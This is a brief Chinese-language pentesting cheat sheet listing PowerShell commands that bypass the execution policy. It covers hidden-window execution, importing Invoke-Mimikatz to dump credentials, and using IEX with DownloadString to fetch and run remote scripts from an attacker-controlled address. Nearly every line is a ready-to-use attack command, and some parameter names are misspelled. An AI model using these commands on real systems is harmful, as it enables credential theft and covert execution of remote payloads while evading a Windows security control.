绕过Powershell执行策略执行ps脚本。
由于powershell默认是不允许执行ps脚本的* 管理员可以改为允许 *,但ps脚本又是渗透测试中非常有用也非常必要的工具,所以想办法绕过执行策略还是非常有必要的。
总结如下
本地绕过权限执行.
powershell -executionpolicy bypass -file xxx.ps1
本地隐藏绕过权限执行.
powershell -executionpolicy bypass -windowsstyle hideden -nologo -nonlnteractive -noprofile -file xxx.ps1
本地导入ps1脚本,并执行函数.
powershell.exe -exec bypass -Command "Import-Module C:\Invoke-Mimikatz.ps1";Invoke-Mimikatz -DumpCreds
本地使用IEX下载远程ps1绕过执行.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.1/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
本地使用IEX下载远程ps1隐藏绕过权限执行.
powershell -executionpolicy bypass -windowstyle hidden -nologo -noprofile IEX(new-object system.net.webclient).downloadstring("http://192.168.0.1/1025.ps1")